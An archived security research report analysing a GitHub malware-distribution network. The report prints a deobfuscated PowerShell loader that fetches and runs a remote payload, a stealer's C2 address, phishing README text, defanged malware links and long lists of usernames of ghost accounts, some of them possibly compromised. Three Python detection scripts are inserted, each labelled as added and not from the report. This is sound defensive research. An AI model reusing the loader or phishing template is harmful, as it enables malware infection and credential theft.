Stargazers Ghost Network - Check Point Research
By antoniost@checkpoint.com
Published: 2024-07-24 · Archived: 2026-04-05 14:47:05 UTC
Research by: Antonis Terefos (@Tera0017)
Key Points
- Check Point Research identified a network of GitHub accounts (Stargazers Ghost Network) that distribute malware or malicious links via phishing repositories. The network consists of multiple accounts that distribute malicious links and malware and perform other actions such as starring, forking, and subscribing to malicious repositories to make them appear legitimate.
- This network is a highly sophisticated operation that acts as a Distribution as a Service (DaaS). It allows threat actors to share malicious links or malware for distribution through highly victim-oriented phishing repositories.
- Check Point Research is tracking the threat group behind this service as Stargazer Goblin. The group provides, operates, and maintains the Stargazers Ghost Network and distributes malware and links via their GitHub Ghost accounts.
- The network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.
- Our latest calculations suggest that more than 3,000 active Ghost accounts are part of the network. Based on core GitHub Ghost accounts, we believe that the network began development or testing on a smaller scale for the first time around August 2022.
- Check Point Research discovered an advertiser in Dark-Web forums that provides the exact GitHub operation. The first advertisement was published on July 8, 2023, from an account created the previous day.
- Based on the monitored campaigns from mid-May to mid-June 2024, we estimate that Stargazer Goblin earned approximately $8,000. However, we believe that this amount is only a small fraction of what the actor made during that period. The total amount during the operations’ lifespan is estimated to be approximately $100,000.
- Stargazers Ghost Network appears to be only one part of the grand picture, with other Ghost accounts operating on different platforms, constructing an even bigger Distribution as a Service universe.
Introduction
Threat actors continually evolve their tactics to stay ahead of detection. Traditional methods of malware distribution via
emails containing malicious attachments are heavily monitored, and the general public has become more aware of these
tactics. Recently, Check Point Research observed threat actors using GitHub to achieve initial infections by utilizing new
methods. Previously, GitHub was used to distribute malicious software directly, with a malicious script downloading either
raw encrypted scripting code or malicious executables.
Their tactics have now changed and evolved. Threat actors now operate a network of “Ghost” accounts that distribute
malware via malicious links on their repositories and encrypted archives as releases. This network not only distributes
malware but also provides various other activities that make these “Ghost” accounts appear as normal users, lending fake
legitimacy to their actions and the associated repositories. Check Point Research has observed these accounts forking,
starring, and watching malicious repositories, creating the illusion of a legitimate project and luring victims into
downloading the “advertised” content.
https://research.checkpoint.com/2024/stargazers-ghost-network/
Page 1 of 45
In a short period of monitoring, we discovered more than 2,200 malicious repositories where “Ghost” activities were
occurring. During a campaign that took place around January 2024, the network distributed Atlantida stealer, a new
malware family that steals user credentials and cryptocurrency wallets along with other personally identifiable information
(PII). This campaign was highly effective, as in less than 4 days, more than 1,300 victims were infected with Atlantida
stealer. The malicious links to the GitHub repositories were possibly distributed via Discord channels. The repositories
targeted various types of victims who wanted to increase their followers on YouTube, Twitch, and Instagram and also
contained phishing templates for cracked software and other crypto-related activities.
Figure 1 – Stargazer Ghost account.
Stargazers Ghost Network
For quite some time, GitHub has been utilized as a platform to distribute malicious code. Typically, repositories involved in
such activities are newly created for specific campaigns and often stay online for long periods of time before being taken
down by GitHub or cleaned up by the threat actors. However, the content within these repositories usually does not suggest
to a normal user that they should download and execute any of the hosted scripts or executables.
These types of attacks do not aim to lure users into directly downloading and executing payloads from the repository itself.
Instead, they often involve scripts that download and execute payloads from seemingly legitimate websites or sources. This
approach helps maintain the appearance of legitimacy while delivering malicious content to victims.
The Stargazers Ghost Network changes the game by providing a malicious repository where a malicious link is “starred”
and “verified” by multiple GitHub accounts, thereby supporting its legitimacy.
Figure 2 – Malicious GitHub account luring Twitch users.
Often, the network utilizes identical tags and images but switches the “targeted audience” from one social media application
or cracked software to another while employing the same template. This suggests that the network operators automate these
activities, ensuring efficiency and scalability in their operations.
Figure 3 – TikTok, YouTube, Twitch, Instagram, … with the same phishing template.
The README.md phishing template contains a malicious DOWNLOAD link to an external website. In some instances, this link
redirects victims to the Releases section of a malicious GitHub repository instead. GitHub usually tries to detect malicious
files or archives, though in many cases, the network uses password-protected archives that “hide” any malicious activities
from scanning solutions.
Figure 4 – Malware is distributed via password-encrypted archive releases.
In this scenario, the README.md contains a phishing download link that does not even redirect to the repository’s own
releases. Instead, it uses three GitHub Ghost accounts with different “responsibilities”:
1. The first account serves the “phishing” repository template.
2. The second account provides the “image” used for the phishing template.
3. The third account serves malware as a password-protected archive in a Release.
This structure and operational method enable Stargazer Goblin to quickly “fix” any broken links that may occur due to
accounts or repositories being banned for malicious activities. By distributing responsibilities across multiple accounts, the
network ensures flexibility in replacing its compromised components. This minimizes disruption to their operations,
allowing them to swiftly adapt and continue their malicious activities on GitHub.
The third account, which serves the malware, is more likely to be detected. When this happens, GitHub bans the entire
account, repository, and associated releases. In response to such actions, Stargazer Goblin updates the first account’s
phishing repository with a new link to a new active malicious release. This allows the network to continue operating with
minimum losses when a malware-serving account is banned.
# [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat)
![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa)
### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.
**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout.
## Features
- Live viewers
- Trovo Account creator
- Chat bot
- Follow bot
- Shares
- Mass report
- Support for multiple accounts to create organic traffic
- Customize time intervals between "views" to simulate a real user
- Simple and easy-to-use user interface
- Support for proxy servers for anonymity and security
## Technologies
- C programming language
- Work with social networks API
- Proxy and anonymity of network requests
- Web scraping and browser automation

To an experienced eye, those repositories seem suspicious. What tipped us off was the high number of “stars” received by
each one of those repositories. Further investigation revealed that the accounts responsible for starring/“liking” these
malicious repositories are integral to the same operation.
Figure 6 – Stargazers of the malicious repository.
We observed a pattern across many of those Stargazer Ghost accounts that contain a repository with these characteristics:
1. Repository name {username}1.
2. Two created files:
   1. The LICENSE of the project.
   2. The README.md file.
Further, the README.md contains as its title the account name followed by “1”, and the text “1”.
Repository: {username}1, README.md content: # {username}1\n1
Figure 7 – GitHub Ghost accounts repository pattern.
When we searched for that specific pattern, we discovered more than 1,100 repositories, which suggests the possibility of
more than 1,100 Ghost GitHub accounts that are part of this malicious Stargazers network.
Figure 8 – README.md content pattern.
Each Ghost-Stargazer within the Stargazers network is not limited to interacting with just one repository. Many of these
accounts engage with multiple repositories, with a significant portion of them clearly involved in malicious activities.
However, some other starred repositories appear just as suspicious, such as some WordPress-related and gaming mods tools.
Figure 9 – Ghost account starred repositories.
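The marker-repository pattern and the co-starring behaviour described above can be combined into a triage check over collected account metadata. The following is an added example, not code from Check Point Research: the `Repo` and `Account` records, the thresholds and the sample accounts are constructed assumptions, and it assumes the input holds every stargazer of the repositories being scored.

```python
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class Repo:
    owner: str
    name: str
    files: frozenset            # top-level file names in the repository
    readme: str = ""


@dataclass
class Account:
    login: str
    repos: list = field(default_factory=list)
    starred: set = field(default_factory=set)    # "owner/name" strings


def is_ghost_repo(repo):
    """True for the pattern on this page: a repository named {username}1 that
    holds only LICENSE and README.md, with README.md '# {username}1' then '1'."""
    expected = f"{repo.owner}1".casefold()
    if repo.name.casefold() != expected:
        return False
    if set(repo.files) != {"LICENSE", "README.md"}:
        return False
    lines = [ln.strip() for ln in repo.readme.splitlines() if ln.strip()]
    return len(lines) == 2 and lines[0].casefold() == f"# {expected}" and lines[1] == "1"


def ghost_logins(accounts):
    """Logins of accounts that own at least one marker repository."""
    return {a.login for a in accounts if any(is_ghost_repo(r) for r in a.repos)}


def flag_repositories(accounts, min_ghost_stars=2, min_ratio=0.5):
    """Rank starred repositories by the share of stargazers that fit the pattern.
    Returns (repository, pattern_stargazers, all_stargazers) rows."""
    ghosts = ghost_logins(accounts)
    total, ghost_stars = Counter(), Counter()
    for acct in accounts:
        for full_name in acct.starred:
            total[full_name] += 1
            ghost_stars[full_name] += acct.login in ghosts
    flagged = [(name, ghost_stars[name], total[name]) for name in total
               if ghost_stars[name] >= min_ghost_stars
               and ghost_stars[name] / total[name] >= min_ratio]
    return sorted(flagged, key=lambda row: (-row[1], row[0]))


def review_candidates(accounts, flagged, min_flagged=2):
    """Accounts without a marker repository that star several flagged
    repositories: candidates for manual review, not a verdict, since the
    page notes that some accounts in the network are compromised."""
    ghosts = ghost_logins(accounts)
    names = {row[0] for row in flagged}
    return sorted(a.login for a in accounts
                  if a.login not in ghosts and len(a.starred & names) >= min_flagged)


def marker_repo(login):
    """Constructed marker repository for a sample account."""
    return Repo(login, f"{login}1", frozenset({"LICENSE", "README.md"}), f"# {login}1\n1\n")


# Constructed sample data; none of these names come from the report.
SAMPLE_ACCOUNTS = [
    Account("acct-a", [marker_repo("acct-a")],
            {"owner-x/tool-a", "owner-x/tool-b", "owner-y/lib"}),
    Account("acct-b", [marker_repo("acct-b")], {"owner-x/tool-a", "owner-x/tool-b"}),
    Account("acct-c", [Repo("acct-c", "dotfiles", frozenset({"README.md", ".vimrc"}), "# dotfiles\n")],
            {"owner-x/tool-a", "owner-y/lib"}),
    Account("acct-d", [], {"owner-x/tool-a", "owner-x/tool-b"}),
    # The name matches, but the repository holds real content: not a marker.
    Account("acct-e", [Repo("acct-e", "acct-e1", frozenset({"LICENSE", "README.md", "src"}), "# acct-e1\n1\n")],
            {"owner-y/lib"}),
]

if __name__ == "__main__":
    flagged = flag_repositories(SAMPLE_ACCOUNTS)
    for name, ghosts, total in flagged:
        print(f"{name}: {ghosts}/{total} stargazers match the marker pattern")
    print("review:", review_candidates(SAMPLE_ACCOUNTS, flagged))
```
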
Based on the wide variety of projects and “interests” of those Ghost Stargazers—ranging from playing Counter-Strike to
Instagram influencers to hacking and protecting machines with cracked anti-virus software—we were able to discover
additional malicious templates and further expand our collection of Ghost Stargazer accounts.
Figure 10 – Game Cheat Repository.
When malicious links redirect to GitHub releases, we’ve observed instances where associated accounts react by liking these
malicious releases. This behavior further reinforces the projects’ perceived “legitimacy” for unsuspecting users.
Figure 11 – Release reactions.
To further separate the accounts and their actions, we discovered cases where other accounts that are also part of this
network made commits to malicious phishing README.md files.
Figure 12 – Commit to another’s account project.
It’s not clear whether all those accounts were created by Stargazer Goblin for malicious purposes. As our research later
suggests, some of those accounts are compromised. This makes GitHub credentials obtained by infostealers valuable and,
furthermore, valuable enough to be sold and bought on underground markets.
“Takedowns” & “Maintenance” Cycle
The multiple and different roles provide easy network maintenance as GitHub will not take down all accounts related to the
repository distributing the malware. This leaves the below accounts to continue their operations with minimal “damage”
when actions are taken against the repository hosting the malware:
1. Repository-Phishing accounts.
2. Commit-Link accounts.
3. Stargazer accounts.
4. Any other accounts.
The repository below, buttercupserial/HubSpot-activation-by-nuat, has been active since 2024-05-28 and has
undergone 6 link changes. These 6 commits were made by
buttercupserial/168463497+buttercupserial@users.noreply.github.com, maintaining the attack chain by updating the
malware links.
Figure 13 – Maintenance commits.
Commit Date            Malware URL
2024-05-28T10:21:50Z   hxxps://github[.]com/bludmooncutie2/bludmooncutie2/releases/tag/latest
2024-05-29T07:35:32Z   hxxps://github[.]com/witch12138/test/releases/tag/lat
2024-06-04T06:51:50Z   hxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat
2024-06-06T07:40:15Z   hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new
2024-06-10T02:09:27Z   hxxps://goo[.]su/gisof1sda –> hxxps://github[.]com/zigzagcharming643/zigzagcharming643/releases/tag/lat
2024-06-10T09:13:52Z   hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new
The commits precisely modify the download link while keeping the remainder of the phishing template intact.
Figure 14 – Link change.
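Commits that rewrite only the download link while leaving the rest of README.md untouched are a reviewable signal in a repository's history. The following is an added example, not code from the report: it compares successive README.md versions and reports the commits whose only change is a link target; the history, URLs and the `min_rotations` threshold are constructed assumptions.

```python
import difflib
import re

# Target of a Markdown link or image: [text](target) or ![alt](target)
LINK_TARGET = re.compile(r"\]\(([^)\s]+)\)")


def mask_targets(line):
    """Replace every link target so two lines can be compared without them."""
    return LINK_TARGET.sub("](<URL>)", line)


def link_only_change(old, new):
    """Return [(old_target, new_target), ...] when two README versions differ
    only in link targets, otherwise an empty list."""
    a, b = old.splitlines(), new.splitlines()
    pairs = []
    matcher = difflib.SequenceMatcher(a=a, b=b, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag == "equal":
            continue
        # Added or removed lines mean the template itself was edited.
        if tag != "replace" or (i2 - i1) != (j2 - j1):
            return []
        for before, after in zip(a[i1:i2], b[j1:j2]):
            if mask_targets(before) != mask_targets(after):
                return []
            pairs += [(x, y) for x, y in zip(LINK_TARGET.findall(before),
                                             LINK_TARGET.findall(after)) if x != y]
    return pairs


def maintenance_commits(history):
    """history: [(commit_id, committed_at, readme_text), ...], oldest first."""
    found = []
    for (_, _, previous), (commit_id, when, current) in zip(history, history[1:]):
        changes = link_only_change(previous, current)
        if changes:
            found.append({"commit": commit_id, "date": when, "changes": changes})
    return found


def rotation_report(history, min_rotations=3):
    """Summarise link rotation; min_rotations is an assumed review threshold."""
    commits = maintenance_commits(history)
    targets = {new for c in commits for _, new in c["changes"]}
    return {"link_only_commits": len(commits),
            "distinct_new_targets": len(targets),
            "flag": len(commits) >= min_rotations}


def sample_readme(url, extra=""):
    """Constructed README in the shape of the template shown on this page."""
    return (f"# [Download]({url})\n"
            "![banner](hxxps://img.example[.]invalid/banner.png)\n"
            "### ViewBot is a tool designed to increase views\n"
            "## Features\n- Live viewers\n" + extra)


# Constructed, defanged sample targets and history.
URL_A = "hxxps://files.example[.]invalid/acct-1/releases/tag/lat"
URL_B = "hxxps://files.example[.]invalid/acct-2/releases/tag/lat"
URL_C = "hxxps://files.example[.]invalid/acct-3/releases/tag/new"
SAMPLE_HISTORY = [
    ("c1", "2024-01-01T10:00:00Z", sample_readme(URL_A)),
    ("c2", "2024-01-02T07:30:00Z", sample_readme(URL_B)),                  # link only
    ("c3", "2024-01-03T09:00:00Z", sample_readme(URL_B, "- Chat bot\n")),  # template edit
    ("c4", "2024-01-05T06:45:00Z", sample_readme(URL_C, "- Chat bot\n")),  # link only
    ("c5", "2024-01-05T12:10:00Z", sample_readme(URL_B, "- Chat bot\n")),  # link only
]

if __name__ == "__main__":
    for commit in maintenance_commits(SAMPLE_HISTORY):
        print(commit["date"], commit["commit"], commit["changes"])
    print(rotation_report(SAMPLE_HISTORY))
```
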
The latest link directs to a release featuring a password-protected archive, Git_softwares_v1.1.2.7z, which executes a Go
downloader, Setup_v1.1.2.exe (SHA256: 98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388).
Figure 15 – Password-protected release.
The network’s maintenance and recovery process appears to be automatic, detecting banned accounts/repositories and fixing
them when necessary. Using different account roles ensures there is only minimal damage when and if GitHub takes action
against accounts or repositories that violated its rules.
Figure 16 – Stargazers Ghost Network Roles Overview.
Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository
takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected. It’s
common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit
account associated with the Link-Repository updates the malicious link with a new one.
The Commit account maintains a one-to-one relationship with all repositories under the Repository account. This means
the same Commit account can make multiple commits to repositories that belong to the same Repository account.
For typical campaigns, we usually observe the following requirements:
- One Repository account, which is the owner of the phishing repository hosting the link to download.
- One Commit account, which makes commits to the repositories belonging to the Repository account.
- One Release account, which creates and adds a malicious archive to the repository’s release and daily updates the archive to stay undetected for a longer period.
- X Stargazer accounts, which fork/star/like the repositories and releases.
In the above scenario, the Release account is usually the first to be banned. Then, the network operator creates a new
malicious link and updates all the Link Repositories using their related Commit Accounts. In conclusion, 2 accounts
(Repository/Commit), plus X number of Stargazers, remain under the radar, while 1 Release account will possibly be
banned at some future point. These network roles managed, in a way, to “bypass” GitHub’s security measures.
Campaign I, Stargazers Ghost Network – Atlantida Stealer
Check Point Research analyzed a specific case in detail, revealing a GitHub campaign that resulted in Atlantida stealer.
The malicious GitHub link was possibly distributed via Discord, targeting Twitch users. The attack chain utilized malicious
scripts hosted on compromised WordPress websites, making us wonder whether the suspicious GitHub repositories with
code for WordPress sites could also play a role.
Figure 17 – Attack Chain Overview.
The victim receives a link to a GitHub phishing repository and clicks on the malicious download link, which directs them to
download a script from a WordPress website. The contacted PHP file, index.php , checks the Referer header from the
HTTP request to verify whether the victim came from GitHub and if the IP address belongs to the TOR network or any other
blacklisted IP. After validation, the PHP file redirects the request to download.php .
README.md content:
## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php)
![window](hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3)
### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.
**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout.
## Features
- Automate page/video views on popular social platforms
- Support for multiple accounts to create organic traffic
- Customize time intervals between "views" to simulate a real user
- Functionality to enhance interaction with content (likes, comments, subscriptions)
- Simple and easy-to-use user interface
- Support for proxy servers for anonymity and security
## Technologies
- Python programming language
- Work with social networks API
- Proxy and anonymity of network requests
- Web scraping and browser automation
## License
[![License](hxxps://img.shields.io/badge/License-MIT-green)](LICENSE)

The file downloaded is a .HTA file named Impress_V1.0.2.hta . This file contains a malicious iframe with a link
executing the VB script code.
[hxxp://astrahebz.com/te/g.mhtml](hxxp://astrahebz.com/te/g.mhtml)
The VB script contains obfuscated code that executes PowerShell, which in turn runs remote code from another WordPress
website.
The VB De-obfuscated code:
PowerShell code executing a .NET Injector.
$crop213 = @'
[DllImport("kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'@
Add-Type -MemberDefinition $crop213 -Namespace "crumble542543" -Name "culture6546"
$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()
[crumble542543.culture6546]::ShowWindow($danger5646, 0)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("hxxps://astrahebz.com/te/tetete.bin")).EntryPoint.Invoke($null, @($null))

This .NET injector creates a regasm.exe process and injects shellcode into it. Finally, the malware dropped is Atlantida
stealer, with C&C 185.172.128.95. The stealer’s network communication is unencrypted plain text. The first connection
sends IP information to 185.172.128.95:6666, and the next sends to 185.172.128.95:6665 an archive with the stolen
information: Screenshot.jpeg, User Infromation.txt, Geo Information.txt, BrowserInfo.txt and, for each browser,
the Cookies/History/…
Figure 20 – Bot’s first request.
Figure 21 – Bot’s second request.
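The PowerShell stage shown earlier in this campaign hides the console window, downloads bytes over HTTP and loads them as a .NET assembly without writing a file, which is a combination that shows up in script block logs. The following is an added example, not code from the report: it scores script text shaped like PowerShell script block logging records (event ID 4104); the trait names, verdict levels and sample events are constructed assumptions.

```python
import re

# Traits taken from the PowerShell stage on this page; names are assumptions.
TRAITS = {
    "inline_pinvoke": re.compile(r"Add-Type\s+-MemberDefinition", re.I),
    "hide_console": re.compile(
        r"GetConsoleWindow.*ShowWindow\s*\([^,()]+,\s*0\s*\)", re.I | re.S),
    "download_bytes": re.compile(r"\.DownloadData\s*\(", re.I),
    "reflective_load": re.compile(
        r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.I),
    "invoke_entrypoint": re.compile(r"\.EntryPoint\.Invoke\s*\(", re.I),
}


def classify(script_block_text):
    """Return (verdict, matched_traits). Downloaded bytes loaded as an assembly
    is 'medium'; the same with the console window hidden is 'high'."""
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(script_block_text))
    fileless = {"download_bytes", "reflective_load"} <= set(hits)
    if fileless and "hide_console" in hits:
        return "high", hits
    if fileless:
        return "medium", hits
    return "none", hits


def triage(events):
    """events: dicts with RecordId and ScriptBlockText; returns flagged rows."""
    rows = []
    for event in events:
        verdict, hits = classify(event["ScriptBlockText"])
        if verdict != "none":
            rows.append((event["RecordId"], verdict, hits))
    return rows


# Constructed samples with defanged placeholder URLs.
LOADER_SAMPLE = """$d = @'
[DllImport("kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'@
Add-Type -MemberDefinition $d -Namespace "ns1" -Name "t1"
$w = [ns1.t1]::GetConsoleWindow()
[ns1.t1]::ShowWindow($w, 0)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("hxxps://payload.example[.]invalid/stage.bin")).EntryPoint.Invoke($null, @($null))
"""

# Same technique split across statements, no window hiding.
STAGED_SAMPLE = """$wc = New-Object System.Net.WebClient
$b = $wc.DownloadData("hxxps://payload.example[.]invalid/stage.bin")
[Reflection.Assembly]::Load($b) | Out-Null
"""

# Benign admin helper: P/Invoke to show (5) rather than hide (0) the window.
WINDOW_HELPER_SAMPLE = """$sig = @'
[DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'@
Add-Type -MemberDefinition $sig -Namespace "Win" -Name "Api"
[Win.Api]::ShowWindow([Win.Api]::GetConsoleWindow(), 5)
"""

# Benign download written to disk, never loaded as an assembly.
FILE_DOWNLOAD_SAMPLE = """$bytes = (New-Object Net.WebClient).DownloadData($url)
[IO.File]::WriteAllBytes($out, $bytes)
"""

SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText": LOADER_SAMPLE},
    {"RecordId": 2, "ScriptBlockText": STAGED_SAMPLE},
    {"RecordId": 3, "ScriptBlockText": WINDOW_HELPER_SAMPLE},
    {"RecordId": 4, "ScriptBlockText": FILE_DOWNLOAD_SAMPLE},
]

if __name__ == "__main__":
    for record_id, verdict, hits in triage(SAMPLE_EVENTS):
        print(record_id, verdict, ", ".join(hits))
```
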
This campaign appears to have targeted victims who wanted to increase their “followers audience” in Twitch, Instagram,
YouTube, Twitter, Trovo, and TikTok or use other tool-related features for Kick Chat, Telegram, Email, and Discord. Some
of those malicious repositories distributing this template and phishing link were:
armoly/Discord-Bot armoly/Ds-Spm armoly/Email-Spm armoly/Tg-Spm armoly/Tg-SpmTg-Spm armoly/Twt-Spm
bleblquck/FT-Vieww bleblquck/Kck-Vw bleblquck/Trv-Vws bleblquck/Tw-Vws dscvm/Discord-Vbot dscvm/Visoul-Grabber glassmuysa/Htlx-Gen-Check glassmuysa/Mail-Ac-Gen glassmuysa/TwT-Genr glassmuysa/Ytb-Dwnld
gooles54/Rison-Raid-Bot gooles54/Rison-Trading-Bot gooles54/WPscn lzero121/TWT-vWS lzero121/Ytb-Vws
lzero121/iNS-vWS lzero121/tK-vWS memekch/TWT-vWS memekch/Ytb-Vws memekch/iNS-vWS memekch/tK-vWS
memo1l/ChatGpt-Turbo sokratso/KMSpic-Ac valiso0/Mail-Ac-Generator valiso0/TwT-Gen valiso0/Ytb-Dwnld
At the same time, more than 380 Stargazer Ghost accounts starred the ~30 repositories listed.
guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev, imazen59, imbored112, ismailsawadi, issabii,
jahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030, khaledbenz2009, khanbhijan, khk6644, kitrock25,
knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, larryewakins, lawadas1231, lenegropu,
lilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz, lucasstarley, lukeomatik, lyyzwjj, lzero121,
m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marcosibottino, mariamlola,
mateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122, misterclima, mjsal,
mohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan,
nendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost,
noobking1234, noobking1234,, notayessir, notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A,
patadoeman222, phuriphatthongkuea, pierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo,
ramdoni, ratihpurnamasar, raul2341, razzm7, rbxrecoveryexploits, rcrobcarlos, rdiaz-002, reekid84, revelicate,
reynaldirey18, richiewrld, rico260104, ricogann, riendlek, riftal12, riocdr, rtR4RWp, rudy172, rxcw777, saadanjaved,
saintxzx, saivaibhavtamiri, samiranf, sarathi, sejgseok, sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599,
tajokshare2023, tamsirdiarra4, teejw, thedani1122, therotmaxxer, titiobig, tjwpo, tonyOsama1546, trev2coldfrr,
tvixterSourceCode, txxzclew, ugyen27, ultralinksgh, vault797478, victid, wa314444, watcharaponnar, webdevuacs,
wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, yokamm, yoosef30, yourscloudyy, yuong22, z8lc,
z8lc60go, zaayaz, zefgzeragze, zuhdi, zuhdi-in
0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha
Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Codi
Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOX
Housamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jas
Kimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagor
Marco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, Mudjator, MuhammadBa
OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT220
SaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, Sourovnag,,
Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILW
Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, amino
axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblanc
fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugot
khanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, kxzpreto,, la
lyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim, marco
mohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan, nend
notglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea, pier
rcrobcarlos, rdiaz-002, reekid84, revelicate, reynaldirey18, richiewrld, rico260104, ricogann, riendlek, rifta
sepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599, tajokshare2023, tamsirdiarra4, teejw, thedani112
victid, wa314444, watcharaponnar, webdevuacs, wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal,
https://research.checkpoint.com/2024/stargazers-ghost-network/
Page 20 of 45
A little less than 2,000 events took place in these repositories. An impressive 621 occurred on May 27, 2024, and 555 on
May 31, 2024, suggesting either that a campaign took place around those dates or that GitHub disrupted some parts of the
operations and Stargazer Goblin “fixed” the affected parts of the network then.
Figure 22 – Stargazers Ghost Accounts activities on repositories related to the Atlantida campaign.
One account owned the repositories, and another made the README.md commits, which, in some cases, also contained their
proton.me email address. The authors of the README.md files were:
| Commit Date | Commit Author | Commit Email | Repository |
|---|---|---|---|
| 2024-05-25T10:44:45Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/TwT-Genr |
| 2024-05-25T11:03:18Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Mail-Ac-Gen |
| 2024-05-25T11:55:04Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Ytb-Dwnld |
| 2024-05-25T12:00:10Z GMT-5 | slaycorpsa | 166757567+slaycorpsa@users.noreply.github.com | glassmuysa/Htlx-Gen-Check |
| 2024-04-11T23:22:47Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Mail-Ac-Generator |
| 2024-04-11T23:24:39Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Mail-Ac-Generator |
| 2024-05-25T12:11:09Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Mail-Ac-Generator |
| 2024-05-25T12:12:25Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/TwT-Gen |
| 2024-05-25T12:15:12Z GMT+2 | twarisua | 166768002+twarisua@users.noreply.github.com | valiso0/Ytb-Dwnld |
| 2024-05-26T10:54:48Z GMT-5 | blagoslo | seppdrmosi21@proton.me | dscvm/Discord-Vbot |
| 2024-05-26T11:07:42Z GMT-5 | blagoslo | seppdrmosi21@proton.me | dscvm/Visoul-Grabber |
| 2024-05-27T13:34:17Z GMT-5 | ellis441 | killimagaro001@proton.me | gooles54/Rison-Raid-Bot |
